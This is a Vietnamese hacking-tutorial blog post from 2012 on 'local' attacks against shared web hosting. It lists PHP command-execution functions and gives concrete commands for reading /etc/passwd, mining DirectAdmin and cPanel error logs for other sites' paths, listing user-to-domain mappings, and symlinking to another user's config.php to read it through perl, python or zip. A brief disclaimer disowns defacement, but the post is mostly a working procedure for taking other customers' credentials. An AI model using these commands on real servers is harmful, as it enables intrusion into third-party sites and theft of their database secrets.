Vài lời cho các bạn !

Blog được xây dựng nhằm cung cấp, sưu tầm nguồn hướng dẫn cho các newbie học tập về hacking website, chứ không mang tính chất vẽ đường cho ai đó đi phá hoại(deface) nhằm gây tổn hại cho website hay sever nào đó. Mong you hãy coi đây như là cuốn ebook hay và bổ ích, cần là giở để xem. và hãy tận dụng nó đúng mục đích ! thanks !

Sunday, June 17, 2012

Tư duy local Cơ Bản

[+] Sử dụng các hàm system call của php để thực thi các command
các hàm system call thường là
exec -->> http://php.net/manual/en/function.exec.php
passthru -->> http://www.php.net/manual/en/function.passthru.php
system -->> http://www.php.net/manual/en/function.system.php
shell_exec -->> http://www.php.net/manual/en/function.shell-exec.php
... etc ..
Vậy ta sẽ thực thi command gì khi các hàm này không bị disabled
Đọc trực tiếp file config của mục tiêu bằng
cat , more , less
Hoặc chuyển đến thư mục của mục tiêu bằng lệnh cd rồi đọc file config bằng cat , more , less hoặc editfile bằng php nếu chmod yếu ....
Xem danh sách các user
cat /etc/passwd
Xem đường dẫn của website qua error_log
DirectAdmin
tail -n 10000 /var/log/httpd/domains/parkdream1.com.error.log|grep parkdream1
Cpanel
tail -n 10000 /usr/local/apache/logs/error_log|grep parkdream1
Danh sách username và domain tương ứng ( đối với DirectAdmin )
cat /etc/virtual/domainowners
Tiếp đến
Tạo file symlink đến mục tiêu thường là file config
ln -s /home/user/public_html/forum/includes/config.php 1.txt
đọc file 1.txt
thường ta sẽ không có quyền đọc file symlink 1.txt này do bị chmod ....
Nhưng ta có thể mượn các tiến trình cao hơn để đọc như
perl , python , zip , Followsymlink ....